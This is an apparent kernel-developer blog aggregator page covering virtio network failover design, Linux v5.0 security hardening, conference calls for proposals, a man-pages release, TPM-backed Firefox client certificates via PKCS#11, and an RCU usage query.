A bond device is a master software network device which can enslave multiple interfaces. In our case these would be the standby and the primary devices. For this, the bond master needs to be created and initialized with slave interface names before the slaves are brought up. When the priority of the primary interface is set higher than that of the standby, the bond will switch between interfaces as required for failover.
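
For concreteness, here is a minimal hedged sketch of such a setup using iproute2 and the bonding sysfs interface; eth0 (the PT device) and eth1 (the PV standby) are hypothetical names:

# create the bond, enslave both devices, then prefer the PT slave
ip link add bond0 type bond mode active-backup
ip link set eth0 down && ip link set eth0 master bond0
ip link set eth1 down && ip link set eth1 master bond0
echo eth0 > /sys/class/net/bond0/bonding/primary
ip link set bond0 up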

The active-backup mode was designed to help create redundancy and improve uptime for systems with multiple NIC devices. To make it work for the virtual machine, we need the guest to detect interface failure on the primary interface and switch to the standby one. This can be achieved, for example, by removing the interface: the hypervisor emulates a hotplug removal request.

However, the above might already hint at some of the issues with this approach to failover: first, the bond needs to be set up by userspace. Configuring a bond for all devices unconditionally would be an option, but would add overhead for all users. On the other hand, adding a slave to the bond requires bringing the slave down. For this reason, to avoid downtime, the bond has to be created upfront, even if only the standby device is present during guest initialization.

Further, setting up an active-backup bond is considered a question of policy and is thus left up to the guest admin. By comparison, network failover is a mechanism - there's no good reason not to use a PT interface if it is available to the guest. Should the hypervisor want to force the guest to create a bond, the hypervisor would need a measure of control over the guest network configuration, which might conflict with the way some guest admins like to set up their networking.

Another issue is with device selection. Bond tends to address devices using their names. While device names under many Linux distributions have recently become more predictable, this is not the case for all distributions, and specific naming schemes might differ. It is thus a challenge for the hypervisor to specify to the guest which interfaces need to be bonded together.

To help reduce downtime, the bond will also broadcast location information on the network on every switch-over. This is not too problematic, but might cause extra load on the network - likely unnecessary in the case of virtual device failover, since the packets end up traveling over the same physical wire.

Maintaining a consistent MAC address for the guest is necessary to avoid the need for all the guest's neighbours to rediscover the MAC address using the slow ARP/Neighbour Discovery process. To help with that, the bond will try to program the MAC address into the primary device when it's attached. If MAC programming is disabled as a security measure (as described above), the bond will generally fail to attach to this slave.

Failover goals; 1, 2 and 3 device models

The goal of the network device failover support in Linux is to address the above problems. Specifically:

- PT cards with MAC programming disabled need to be supported
- configuration should happen automatically, with no need for userspace to make a policy decision - in particular, the primary/standby pair of devices should be selected with no need for special configuration to be passed from the hypervisor
- support as wide a range of existing network setup tools as possible, with minimal changes

Most of the design seems to fall out from the above goals in a manner that is more or less straight-forward:

- the design supports two devices: a standby PV device is present at all times and used by default; a primary PT device is used by preference when it's available
- failover support is initialized by the PV device driver; e.g. in the case of Virtio this happens when the Virtio-net driver detects a special feature bit set by the hypervisor on the Virtio PV device
- to support devices without MAC programming, both standby and primary can simply be required to be initialized (e.g. by the hypervisor) with the same MAC address - in that case, the MAC address can also be used by failover to locate and enslave the primary device

However, the requirement to minimize userspace changes caused a certain amount of debate about the best way to model the failover setup, with the debate centered around the number of network device structures being created and exposed to userspace. It seems worthwhile to list the options that have been debated, below:

1-device model

In a 1-device model, userspace sees a single failover device at all times. At any time this device would be backed by either the PT or the PV device. As userspace might need to configure devices differently depending on the specific driver used, a new interface would have to be introduced for the kernel to report driver changes to userspace, and for userspace to detect the actual driver used. However, as long as userspace does not contain any driver-specific code, userspace tools that already work with the Virtio device seem to be guaranteed to keep working without any changes, but with better performance.

To best of author’s knowledge, no actual code supporting this mode has ever been posted.

2-device model

In a 2-device model, the standby and primary devices are exposed to userspace as two network devices. The devices aren't independent: the primary device is a slave and the standby is the master, in that when the primary is present, the standby device forwards outgoing packets to it for transmission.

PT driver discovery and device specific configuration can happen on the slave interface using standard device discovery interfaces.

Both portable configuration affecting both PV and PT devices (such as interface MTU) and the configuration that is specific to the PV device will happen on the master interface.

The 2-device model is used by the netvsc driver in Linux. It has been used in production for a number of years with no significant issues reported. However, it diverges from the model used by the bond driver, and the combination of PV-specific and portable configuration on the master device was seen by some developers as confusing.

3-device model

The 3-device model basically follows bond: a master failover device forwards packets to either the primary or the standby slave, depending on the primary's availability.

The failover device maintains the portable configuration; the primary and standby can each have their own driver-specific configuration.

This model is used by the net_failover driver, which has been present in Linux since version 4.17. This model isn't transparent to userspace: for example, the presence of at least two devices (failover master and primary slave) at all times seems to confuse some userspace tools such as dracut, udev, initramfs-tools, and cloud-init. Most of these tools have since been updated to check the slave flag of each interface and ignore interfaces where it is set.
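
As an illustration, here is a hedged sketch of the kind of check such tools can perform; the kernel exposes a "master" link in sysfs for enslaved devices:

# skip enslaved (failover/bond slave) interfaces; the loop body is illustrative
for dev in /sys/class/net/*; do
    [ -e "$dev/master" ] && continue
    echo "would configure: ${dev##*/}"
done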

3-device model with hidden slaves

It is possible that the compatibility of the 3-device model with existing userspace can be improved by somehow hiding the slave devices from most legacy userspace tools, unless they explicitly ask for them.

For example it could be possible to somehow move them to some kind of special network namespace. No patches to implement this idea have been posted so far.

Hypervisor failover support

At the time of writing this article, support for virtual network device failover in the QEMU/KVM hypervisor is still being worked on. This work has uncovered a surprising number of subtle issues, some of which are covered below.

Primary device availability

The network failover driver relies on hotplug events for primary device availability. In other words, to make the primary device available to the guest, the hypervisor emulates a hot-add hotplug event on a bus within the VM (e.g. the virtual PCI bus). To make the primary device unavailable, a hot-unplug event is emulated.

Note that at the moment most PCI drivers expect a chance to be notified and to execute cleanup before a device is removed. From the hypervisor's point of view, this means that it can not remove the PT device, and e.g. can not initiate migration, until it receives a response from the VM guest. Making the hypervisor depend on the guest being responsive in this way is problematic, e.g. from the security point of view.

As described earlier in an lwn.net article, most drivers do not at the moment support surprise removal well. When that is addressed, hypervisors will be able to switch to emulating surprise removal, removing the dependency on guest responsiveness.

Existing Guest compatibility

One of the issues that hypervisors take pains to handle well is compatibility with existing guests, that is, guests which have not been modified to support virtual network device failover.

One possible issue is that existing guests can become confused if they detect two Ethernet devices with the same MAC address.

To help address this issue, the hypervisor can defer making the primary device visible to the guest until after the PV driver has been initialized. The PV driver can, in turn, signal the guest's support for virtual network device failover to the hypervisor.

For example, in the case of the virtio-net driver, the hypervisor can signal support for failover to the guest by setting the VIRTIO_NET_F_STANDBY host feature bit on the Virtio device. If failover is enabled, the driver can signal failover support to the hypervisor by setting the matching VIRTIO_NET_F_STANDBY guest feature bit on the device.
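
As a rough illustration, you can inspect what the hypervisor offered from inside a Linux guest via sysfs; a hedged sketch, assuming virtio0 is the PV NIC:

# the "features" attribute is a string of '0'/'1' characters, device feature
# bit 0 first; VIRTIO_NET_F_STANDBY is bit 62, i.e. character 63
cut -c63 /sys/bus/virtio/devices/virtio0/features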

After detecting a modern guest with failover support, the hypervisor can hot-add the primary device. The device will have to be hot-removed again on guest reset - in case the VM reboots into a legacy guest without failover support.

This is also helpful to avoid initializing a useless failover device on hypervisors without actual failover support.

As of the time of writing of this article, the definition of the VIRTIO_NET_F_STANDBY and its support are present in Linux. Some preliminary hypervisor patches with known issues have been posted.

Packet filtering issues

Early implementations of failover in QEMU were tested with an emulated NIC. When tested on a physical one, it quickly became apparent that significant downtime occurs in many configurations.

The reason has to do with how incoming packets are processed by the host NIC. Generally, a packet is matched against some rules (e.g. the destination MAC is matched using a forwarding filter) and a decision is made to forward the packet either to the hypervisor or to a guest through a VF.

[Figure: incoming packet filtered]

Consider again a hypervisor transitioning from a configuration where a primary passthrough VF is available to the guest to a configuration where it is unavailable.

When the primary device is available to the guest, we want incoming packets with a destination MAC matching the device to be forwarded through the primary. In many configurations this happens immediately once the hypervisor programs the MAC into the VF. In these setups, when the primary device becomes unavailable to the guest, unless special steps are taken, incoming packets will still be filtered to it and eventually dropped.

[Figure: incoming packet being dropped by device]

One possible fix is to have the hypervisor update the host NIC filtering, e.g. by updating the MAC of the VF to a different value. Another is to change the filtering on the host NIC such that it only happens when a driver is attached to the VF. This already seems to be the case for some drivers (such as ice, mlx), so one can argue that others should be changed to behave consistently. Another approach would be to teach the hypervisor to detect the difference and handle both types of behaviour.

Conversely, when the primary interface becomes available to the guest, we would like packets to start flowing through the primary, but only after the driver is bound to it. Again, on some devices the hypervisor might need to intervene to update the forwarding filter on the host NIC. One issue is that it might take the guest a while to detect a hot-add event and bind a driver to the primary device, because hotplug is not generally considered a data path operation. Should the host NIC filter be updated by the hypervisor immediately on hot-add, there would be a large window during which the guest driver has not yet been initialized.

[Figure: incoming packet being dropped by driver]

As a possible fix, hypervisors can detect that the pass-through driver has been attached to the device. For example, drivers enable bus-mastering on the device when they start using it, and disable it when they stop using it. The hypervisor can detect this event and update the forwarding filter on the host NIC accordingly.
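
To make the bus-mastering handshake concrete, here is a hedged guest-side illustration (the slot address is hypothetical); bit 2 of the PCI command register is the bus-master enable bit a driver sets when it starts driving the device:

# read the PCI command register of the VF from inside the guest
setpci -s 00:03.0 COMMAND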

QEMU patches addressing both issues have been posted on the QEMU mailing list.

An alternative could be to add a way for guest to request the switch between primary and standby through the PV device driver. This might reduce the downtime slightly: some PT drivers might enable bus mastering before they are fully ready to receive packets, causing a small window during which packets are still dropped.

This alternative approach is used by the netvsc driver. Using it with net_failover would require extending the Virtio interface and adding support to the net_failover driver in Linux; as of today, no patches implementing this change have been posted.

As described above, some differences in behaviour between host NICs make the failover implementation harder. While not yet widely supported, use of VF representors could make it easier to configure host NICs consistently for use by failover. However, for this to be helpful to userspace, wide support across many NICs would be necessary.

Non-MAC based pairing

One basic question that had to be addressed early in the design was: how does the failover master decide which slave devices to bind to? Unlike bond, failover by design can not rely on the administrator supplying the configuration.

So far, implementations have focused on matching MAC addresses as the way to pair slave devices. However, in some configurations (sometimes called trusted VFs) the hypervisor does not supply VF MAC addresses.

This seems to call for an alternative mechanism for locating the primary that is not based on the MAC address.

The netvsc driver uses a serial number value to locate the primary device. The serial is typically communicated through the VMBus interface and attached to a para-virtual PCI bus slot created for the device. QEMU/KVM traditionally do not have a para-virtual bus implementation, relying instead on emulating a PCI bus for VMs. One possible approach for QEMU would be to attach an ID value to a PCI slot or bridge. For example, an ACPI Slot Unique Number, the PCI Physical Slot Number register, or an alternative vendor-specific ID register could fit this purpose. The ID could be supplied to the VM guest through the Virtio device. The failover driver would locate the slot based on the ID, and bind to any device located behind the slot. It would then program the MAC address from the standby device into the primary device.

An early implementation of this idea has been posted on the QEMU mailing list, however no patches to the failover driver have been posted yet.

Host network topology and other optimizations

In some configurations it might be better for the guest to use the PV interface in preference to the passthrough one. For example, if the PCI bus is very busy, and there’s spare CPU capacity on the host, it might be faster to send a packet that is destined to another VM on the same host through the hypervisor, bypassing the PCI bus.

This seems to call for keeping both interfaces active at all times. Supporting such an optimization would need to address the possibility of VM migration as well as the dynamic nature of the CPU/PCI bus available capacity, such that the specific interface used for sending packets to each destination can change at any time.

No patches for such support have been posted as of the time of writing of this article.

Specification status

Definition of the VIRTIO_NET_F_STANDBY has been included in the latest Virtio specification draft virtio-v1.1-csprd01.

Non-Linux/non-KVM support

Besides Linux, which systems could benefit from virtual network device failover support?

The DPDK set of userspace drivers is set to gain this support soon.

Drivers for other operating systems could also benefit from increased performance. One can expect the work on these drivers to start in earnest once the hypervisor support is widely available.

Other virtual devices besides Virtio could implement failover. netvsc already has a 2-device implementation that does not rely on the net_failover driver. It is possible that xen-netfront or vmxnet devices could use the failover driver. The author is not familiar with these devices.

Summary

A straightforward-sounding idea - improving performance for a Virtio network device by allowing networking traffic for the VM to temporarily travel over a pass-through device - exposed a wealth of issues on both the VM host and guest sides.

Acknowledgements

The author thanks Jens Freimann for help analyzing netvsc as well as for proof-reading the draft and suggesting corrections. The author also thanks the multiple contributors who worked on the implementation and helped review and guide the feature design over time.

March 17, 2019 05:22 AM

March 12, 2019

Kees Cook: security things in Linux v5.0

Previously: v4.20.

Linux kernel v5.0 was released last week! Looking through the changes, here are some security-related things I found interesting:

read-only linear mapping, arm64
While x86 has had a read-only linear mapping (or “Low Kernel Mapping” as shown in /sys/kernel/debug/page_tables/kernel under CONFIG_X86_PTDUMP=y) for a while, Ard Biesheuvel has added them to arm64 now. This means that ranges in the linear mapping that contain executable code (e.g. modules, JIT, etc), are not directly writable any more by attackers. On arm64, this is visible as “Linear mapping” in /sys/kernel/debug/kernel_page_tables under CONFIG_ARM64_PTDUMP=y, where you can now see the page-level granularity:

---[ Linear mapping ]---
...
0xffffb07cfc402000-0xffffb07cfc403000    4K PTE   ro NX SHD AF NG    UXN MEM/NORMAL
0xffffb07cfc403000-0xffffb07cfc4d0000  820K PTE   RW NX SHD AF NG    UXN MEM/NORMAL
0xffffb07cfc4d0000-0xffffb07cfc4d1000    4K PTE   ro NX SHD AF NG    UXN MEM/NORMAL
0xffffb07cfc4d1000-0xffffb07cfc79d000 2864K PTE   RW NX SHD AF NG    UXN MEM/NORMAL

per-task stack canary, arm
ARM has supported stack buffer overflow protection for a long time (currently via the compiler’s -fstack-protector-strong option). However, on ARM, the compiler uses a global variable for comparing the canary value, __stack_chk_guard. This meant that everywhere in the kernel needed to use the same canary value. If an attacker could expose a canary value in one task, it could be spoofed during a buffer overflow in another task. On x86, the canary is in Thread Local Storage (TLS, defined as %gs:20 on 32-bit and %gs:40 on 64-bit), which means it’s possible to have a different canary for every task since the %gs segment points to per-task structures. To solve this for ARM, Ard Biesheuvel built a GCC plugin to replace the global canary checking code with a per-task relative reference to a new canary in struct thread_info. As he describes in his blog post, the plugin results in replacing:

8010fad8:       e30c4488        movw    r4, #50312      ; 0xc488
8010fadc:       e34840d0        movt    r4, #32976      ; 0x80d0
...
8010fb1c:       e51b2030        ldr     r2, [fp, #-48]  ; 0xffffffd0
8010fb20:       e5943000        ldr     r3, [r4]
8010fb24:       e1520003        cmp     r2, r3
8010fb28:       1a000020        bne     8010fbb0
...
8010fbb0:       eb006738        bl      80129898 <__stack_chk_fail>

with:

8010fc18:       e1a0300d        mov     r3, sp
8010fc1c:       e3c34d7f        bic     r4, r3, #8128   ; 0x1fc0
...
8010fc60:       e51b2030        ldr     r2, [fp, #-48]  ; 0xffffffd0
8010fc64:       e5943018        ldr     r3, [r4, #24]
8010fc68:       e1520003        cmp     r2, r3
8010fc6c:       1a000020        bne     8010fcf4
...
8010fcf4:       eb006757        bl      80129a58 <__stack_chk_fail>

r2 holds the canary saved on the stack and r3 the known-good canary to check against. In the former, r3 is loaded through r4 at a fixed address (0x80d0c488, which “readelf -s vmlinux” confirms is the global __stack_chk_guard). In the latter, it’s coming from offset 0x24 in struct thread_info (which “pahole -C thread_info vmlinux” confirms is the “stack_canary” field).

per-task stack canary, arm64
The lack of per-task canary existed on arm64 too. Ard Biesheuvel solved this differently by coordinating with GCC developer Ramana Radhakrishnan to add support for a register-based offset option (specifically “-mstack-protector-guard=sysreg -mstack-protector-guard-reg=sp_el0 -mstack-protector-guard-offset=...“). With this feature, the canary can be found relative to sp_el0, since that register holds the pointer to the struct task_struct, which contains the canary. I’m hoping there will be a workable Clang solution soon too (for this and 32-bit ARM). (And it’s also worth noting that, unfortunately, this support isn’t yet in a released version of GCC. It’s expected for 9.0, likely this coming May.)

top-byte-ignore, arm64
Andrey Konovalov has been laying the groundwork with his Top Byte Ignore (TBI) series which will also help support ARMv8.3’s Pointer Authentication (PAC) and ARMv8.5’s Memory Tagging (MTE). While TBI technically conflicts with PAC, both rely on using “non-VA-space” (Virtual Address) bits in memory addresses, and getting the kernel ready to deal with ignoring non-VA bits. PAC stores signatures for checking things like return addresses on the stack or stored function pointers on heap, both to stop overwrites of control flow information. MTE stores a “tag” (or, depending on your dialect, a “color” or “version”) to mark separate memory allocation regions to stop use-after-free and linear overflows. For either of these to work, the CPU has to be put into some form of the TBI addressing mode (though for MTE, it’ll be a “check the tag” mode), otherwise the addresses would resolve into totally the wrong place in memory. Even without PAC and MTE, this byte can be used to store bits that can be checked by software (which is what the rest of Andrey’s series does: adding this logic to speed up KASan).

ongoing: implicit fall-through removal
An area of active work in the kernel is the removal of all implicit fall-through in switch statements. While the C language has a statement to indicate the end of a switch case (“break“), it doesn’t have a statement to indicate that execution should fall through to the next case statement (just the lack of a “break” is used to indicate it should fall through — but this is not always the case), and such “implicit fall-through” may lead to bugs. Gustavo Silva has been the driving force behind fixing these since at least v4.14, with well over 300 patches on the topic alone (and over 20 missing break statements found and fixed as a result of the work). The goal is to be able to add -Wimplicit-fallthrough to the build so that the kernel will stay entirely free of this class of bug going forward. From roughly 2300 warnings, the kernel is now down to about 200. It’s also worth noting that with Stephen Rothwell’s help, this bug has been kept out of linux-next by him sending warning emails to any tree maintainers where a new instance is introduced (for example, here’s a bug introduced on Feb 20th and fixed on Feb 21st).
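
If you want to see the remaining instances in your own tree, KCFLAGS is the usual way to inject extra compiler flags into a kernel build; a hedged sketch (the flag needs GCC 7 or later):

make KCFLAGS=-Wimplicit-fallthrough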

ongoing: refcount_t conversions
There also continues to be work converting reference counters from atomic_t to refcount_t so they can gain overflow protections. There have been 18 more conversions since v4.15 from Elena Reshetova, Trond Myklebust, Kirill Tkhai, Eric Biggers, and Björn Töpel. While there are more complex cases, the minimum goal is to reduce the Coccinelle warnings from scripts/coccinelle/api/atomic_as_refcounter.cocci to zero. As of v5.0, there are 131 warnings, with the bulk of the remaining areas in fs/ (49), drivers/ (41), and kernel/ (21).
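
The remaining sites can be listed with the kernel's Coccinelle integration; a hedged sketch using the script named above:

make coccicheck COCCI=scripts/coccinelle/api/atomic_as_refcounter.cocci MODE=report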

userspace PAC, arm64
Mark Rutland and Kristina Martsenko enabled kernel support for ARMv8.3 PAC in userspace. As mentioned earlier about PAC, this will give userspace the ability to block a wide variety of function pointer overwrites by “signing” function pointers before storing them to memory. The kernel manages the keys (i.e. selects random keys and sets them up), but it’s up to userspace to detect and use the new CPU instructions. The “paca” and “pacg” flags will be visible in /proc/cpuinfo for CPUs that support it.
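
A quick hedged check for those flags on a PAC-capable machine:

grep -o -E 'paca|pacg' /proc/cpuinfo | sort -u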

platform keyring
Nayna Jain introduced the trusted platform keyring, which cannot be updated by userspace. This can be used to verify platform or boot-time things like firmware, initramfs, or kexec kernel signatures, etc.

Edit: added userspace PAC and platform keyring, suggested by Alexander Popov
Edit: tried to clarify TBI vs PAC vs MTE

That’s it for now; please let me know if I missed anything. The v5.1 merge window is open, so off we go! :)

© 2019, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.

March 12, 2019 11:04 PM

Linux Plumbers Conference: Linux Plumbers Conference 2019 Call for Refereed-Track Proposals

We are pleased to announce the Call for Refereed-Track talk proposals for the 2019 edition of the Linux Plumbers Conference, which will be held in Lisbon, Portugal on September 9-11 in conjunction with the Linux Kernel Maintainer Summit.

Refereed track presentations are 50 minutes in length (which includes time for questions and discussion) and should focus on a specific aspect of the “plumbing” in the Linux system. Examples of Linux plumbing include core kernel subsystems, toolchains, container runtimes, core libraries, windowing systems, management tools, device support, media creation/playback, and so on. The best presentations are not about finished work, but rather problems, proposals, or proof-of-concept solutions that require face-to-face discussions and debate.

For more information on submitting a Refereed-Track talk proposal, see the following:

https://www.linuxplumbersconf.org/event/4/abstracts

Please note that the submission system is the same as in 2018. If you created a user account last year, you will be able to re-use the same credentials to submit and modify your proposal(s) this year.

The call for Microconferences proposals is also open, and we hope to see you in Lisbon this coming September!

March 12, 2019 04:22 PM

Linux Plumbers Conference: Linux Plumbers Conference 2019 Call for Microconference Proposals

We are pleased to announce the Call for Microconferences for the 2019 edition of the Linux Plumbers Conference, which will be held in Lisbon, Portugal on September 9-11 in conjunction with the Linux Kernel Maintainer Summit.

A microconference is a collection of collaborative sessions focused on problems in a particular area of the Linux plumbing, which includes the kernel, libraries, utilities, services, UI, and so forth, but can also focus on cross-cutting concerns such as security, scaling, energy efficiency, toolchains, container runtimes, or a particular use case. Good microconferences result in solutions to these problems and concerns, while the best microconferences result in patches that implement those solutions. For more information on submitting a microconference proposal, see the following:

https://www.linuxplumbersconf.org/event/4/abstracts

Please note that the submission system is the same as in 2018. If you created a user account last year, you will be able to re-use the same credentials to submit and modify your proposal(s) this year.

Look for the upcoming call for refereed-track proposals, and we hope to see you in Lisbon this coming September!

March 12, 2019 12:07 AM

March 07, 2019

Michael Kerrisk (manpages): man-pages-5.00 is released

I've released man-pages-5.00. The release tarball is available on kernel.org. The browsable online pages can be found on man7.org. The Git repository for man-pages is available on kernel.org.

This release resulted from patches, bug reports, reviews, and comments from around 130 contributors. The release is rather larger than average, since it has been nearly a year since the last release. The release includes more than 600 commits that changed nearly 400 pages. In addition, 3 new manual pages were added.

Among the more significant changes in man-pages-5.00 are the following:

In addition, two pages have been removed in this release after encouragement from Ingo Schwarze: mdoc(7) and mdoc.samples(7). As the commit message notes, groff_mdoc(7) from the groff project provides a better equivalent of mdoc.samples(7) and the mandoc project provides a better mdoc(7). And nowadays, there are virtually no pages in man-pages that use mdoc markup.

Again special thanks to Eugene Syromyatnikov, who contributed nearly 30 patches to this release!

March 07, 2019 04:57 AM

March 06, 2019

James Bottomley: Using TPM Based Client Certificates on Firefox and Apache

One of the useful features of Apache (or indeed any competent web server) is the ability to use client side certificates. All this means is that a certificate from each end of the TLS transaction is verified: the browser verifies the website certificate, but the website requires the client also to present one and verifies it. Using client certificates, when linked to your own client certificate CA, gives web transactions the strength of two factor authentication if you do it on the login page. I use this feature quite a lot for all the admin features of my own website. With Apache it's really simple to turn on with the

SSLCACertificateFile

Directive, which allows you to specify the CA for the accepted certificates. In my own setup I have my own self signed certificate as the CA, and then all the authority certificates use it as the issuer. You can turn on Client Certificate verification on a per-location basis simply by doing

<Location /some/web/location>
SSLVerifyClient require
</Location>

And Apache will take care of requesting the client certificate and verifying it against the CA. The only caveat here is that TLSv1.3 currently fails to work for this, so you have to disable it with

SSLProtocol -TLSv1.3

Client Certificates in Firefox

Firefox is somewhat hard to handle for SSL because it includes its own hand-written Mozilla secure sockets code, which has a toolkit quite unlike any other ssl toolkit1. In order to import a client certificate and key into Firefox, you need to create a pkcs12 file containing them and import that into the “Your Certificates” box, which is under Preferences > Privacy & Security > View Certificates
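
Creating that pkcs12 file is a one-liner with openssl; a hedged sketch where the file names are placeholders for your client key and certificate:

openssl pkcs12 -export -inkey client.key -in client.crt -name "my client cert" -out client.p12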

Obviously, simply supplying a key file to Firefox presents security issues, because you'd like to prevent a clever hacker from gaining access to it and thus running off with your client certificate. Firefox achieves a modicum of security by doing all key operations over the PKCS#11 API via a software token, which should mean that even malicious javascript cannot gain access to your key, but merely to the signing API.

However, assuming you don’t quite trust this software separation, you need to store your client signing key in a secure vault like a TPM to make sure no web hacker can gain access to it. Various crypto system connectors, like the OpenSSL TPM2 and TPM2 engine, already exist but because Firefox uses its own crytographic code it can’t take advantage of them. In fact, the only external object the Firefox crypto code can use is a PKCS#11 module.

Aside about TPM2 and PKCS#11

The design of PKCS#11 is that it is a loadable library which can find and enumerate keys and certificates in some type of hardware device like a USB key or a PCI attached HSM. However, since the connector is simply a library, nothing requires that it connect to something physical, and the OpenDNSSEC project actually produces a purely software based cryptographic token. In theory, then, it should be easy.

The problems come with the PKCS#11 expectation of key residency: the library allows the consuming program to enumerate a list of slots, each of which may, or may not, be occupied by a single token. Each token may contain one or more keys and certificates. Now, the TPM does have a concept of a key resident in NV memory, which is directly analogous to the PKCS#11 concept of a token based key. The problems start with the TPM2 PC Client Profile, which recommends this NV area be about 512 bytes - big enough for all of one key and thus not very scalable. In fact, the imagined use case of the TPM is with volatile keys which are demand loaded.

Demand loaded keys map very nicely to the OpenSSL idea of a key file, which is why OpenSSL TPM engines are very easy to understand and use, but they don't map at all onto the concept of token resident keys. The closest interface PKCS#11 has for handling key files is the provisioning calls, but even those are designed for placing keys inside tokens and, once provisioned, the keys are expected to be non-volatile. Worse still, very few PKCS#11 module consumers actually do provisioning; they mostly leave it up to a separate binary they expect the token producer to supply.

Even if the demand loading problem could be solved, the PKCS#11 API requires quite a bit of additional information about keys, like ids, serial numbers and labels that aren’t present in the standard OpenSSL key files and have to be supplied somehow.

Solving the Key File to PKCS#11 Mismatch

The solution seems reasonably simple: build a standard PKCS#11 library that is driven by a known configuration file. This configuration file can map keys to slots, as required by PKCS#11, and also supply all the missing information. The C_Login() operation is expected to supply a passphrase (or PIN in PKCS#11 speak), so that would be the point at which the private key could be loaded.

One of the interesting features of the above is that, while it could be implemented for the TPM engine only, it can also be implemented as a generic OpenSSL key exporter to PKCS#11 that happens also to take engine keys. That would mean it would work for non-engine keys as well as any engine that exists for OpenSSL … a nice little win.

Building an OpenSSL PKCS#11 Key Exporter

A token can be built from a very simple ini-like configuration file, with the global section setting global properties, like manufacturer id and library description, and each individual section being used to instantiate a slot containing one key. We can make the slot name, the id and the label the same if not overridden, and use key file directives to load the public and private keys. The serial number seems best constructed from a hash of the public key parameters (again, if not overridden). In order to support engine keys, the token library needs to know which engine to invoke, so I added an engine keyword to tell it.

With that, the mechanics of making the token library work with any OpenSSL key are set, the only thing is to plumb in the PKCS#11 glue API. At this point, I should add that the goal is simply to get keys and tokens working, not to replicate a full featured PKCS#11 API, so you shouldn’t use this as something to test against for a reference implementation (the softhsm2 token is much better for that). However, it should be functional enough to use for storing keys in Firefox (as well as other things, see below).

The current reasonably full featured source code is here, with a reference build using the OpenSUSE Build Service here. I should add that some of the build failures are due to problems with p11-kit and others due to the way Debian gets the wrong engine path for libp11.

At Last: Getting TPM Keys working with Firefox

A final problem with Firefox is that there seems to be no way to import a certificate file for which the private key is located on a token. The only way Firefox seems to support this is if the token contains both the private key and the certificate. At least this is my own project, so some coding later, the token now supports certificates as well.

The next problem is more mundane: generating the certificate and key. Obviously, the safest key is one which has never left the TPM, which means the certificate request needs to be built from it. I chose a CSR type that also includes my name and my machine name for later easy discrimination (and revocation if I ever lose my laptop). This is the sequence of commands for my machine called jarvis.

create_tpm2_key -a key.tpm
openssl req -subj "/CN=James Bottomley/UID=jarvis/" -new -engine tpm2 -keyform engine -key key.tpm -nodes -out jarvis.csr
openssl x509 -in jarvis.csr -req -CA my-ca.crt -engine tpm2 -CAkeyform engine -CAkey my-ca.key -days 3650 -out jarvis.crt

As you can see from the above, the key is first created by the TPM, then that key is used to create a certificate request where the common name is my name and the UID is the machine name (this is just my convention, feel free to use your own) and then finally it’s signed by my own CA, which you’ll notice is also based on a TPM key. Once I have this, I’m free to create an ini file to export it as a token to Firefox

manufacturer id = Firefox Client Cert
library description = Cert for hansen partnership
[mozilla-key]
certificate = /home/jejb/jarvis.crt
private key = /home/jejb/key.tpm
engine = tpm2

All I now need to do is load the PKCS#11 shared object library into Firefox using Settings > Privacy & Security > Security Devices > Load and I have a TPM based client certificate ready for use.

Additional Uses

It turns out that once you have a generic PKCS#11 exporter for engine keys, there's no end of uses for them. One of the most convenient has been using TPM2 keys with gnutls. Although gnutls was quick to adopt TPM 1.2 based keys, it's been much slower with TPM2; but because gnutls already has a PKCS#11 interface using the p11-kit URI format, you can easily build a config file of all the TPM2 keys you want it to use and simply use them by URI in gnutls.

Unfortunately, this has also led to some problems, the biggest one being Firefox: Firefox assumes, once you load a PKCS#11 module library, that you want it to use every single key it can find, which is fine until it pops up 10 dialogue boxes each time you start it, one for each key password, particularly if there's only one key you actually care about using. This problem doesn't seem solvable in the Firefox token interface, so the eventual way I did it was to add the ability to specify the config file in the environment (variable OPENSSL_PKCS11_CONF) and modify my xfce Firefox action to set this in the environment, pointing at a special configuration file with only Firefox's key in it.
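
For example, the launcher now effectively does something like this (hedged; the config file path is arbitrary):

env OPENSSL_PKCS11_CONF=$HOME/.config/firefox-token.conf firefox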

Conclusions and Future Work

Hopefully I’ve demonstrated this simple PKCS#11 converter can be useful both to keeping Firefox keys safe as well as uses in other things like gnutls. Unfortunately, it turns out that the world wide web is turning against PKCS#11 tokens as having usability problems and is moving on to something called FIDO2 tokens which have the web browser talking directly to the USB token. In my next technical post I hope to explain how you can use the Linux Kernel USB gadget system to connect a TPM up easily as a FIDO2 token so you can use the new passwordless webauthn protocol seamlessly.

March 06, 2019 08:21 PM

March 05, 2019

Paul E. Mc Kenney: Parallel Programming: March 2018 deferred-processing query

TL;DR: Do you know of additional publicly visible production uses of sequence locking, hazard pointers, or RCU not already called out in the remainder of this blog post?

I am updating the deferred-processing chapter of “Is Parallel Programming Hard, And, If So, What Can You Do About It?” and would like to include a list of publicly visible production uses of sequence locking, hazard pointers, and RCU. I suppose I could also include reference counting, but given that it was well known before I was born, I expect that its list would be way too long to be useful!

The only production use of sequence locking that I am aware of is within the Linux kernel, but I would be surprised if it is not rather widely used. Can you tell me of more publicly visible production sequence-locking uses?

Hazard pointers is used within MongoDB (v3.0 and later) and within Facebook's Folly library, which is used in production at Facebook and perhaps elsewhere as well. It is also implemented by several libraries called out on its Wikipedia page (Concurrent Building Blocks, Concurrency Kit, Atomic Ptr Plus, and libcds). Hazard pointers is also sometimes called “safe memory reclamation” (SMR). Any other production hazard-pointers uses?

RCU is used within the Linux kernel, the FreeBSD kernel, the OpenBSD kernel, Linux Trace Toolkit Next Generation (LTTng), QEMU, Knot DNS, Netsniff-ng, Sheepdog, GlusterFS, and gdnsd. It is also implemented by several libraries, including Userspace RCU, Concurrency Kit, Facebook's Folly library, and libcds. RCU is also called “epochs” (from Keir Fraser), “generations” (from Tornado/K42), “passive serialization” (from IBM zVM), and probably other things as well. Any other production RCU uses?

So what do I mean by “publicly visible”? Open-source projects should qualify, as should scholarly publications regarding proprietary projects. Similarly, “production use” means use for getting some job done, as opposed to research, prototyping, or benchmarking. Not that there is necessarily anything wrong with research, prototyping, or benchmarking, but we are looking for things a little bit further along the hype cycle. ;-)

March 05, 2019 06:45 PM

February 28, 2019

Pete Zaitcev: Suddenly RISC-V

I knew about that thing because Rich Jones was a fan. Man, that guy is always ahead of the curve.

Coincidentally, a couple of days ago Amazon announced support for RISC-V in FreeRTOS (I have no idea how free that thing is. It's MIT licensed, but with Amazon, it might be patented up the gills.).

February 28, 2019 07:51 PM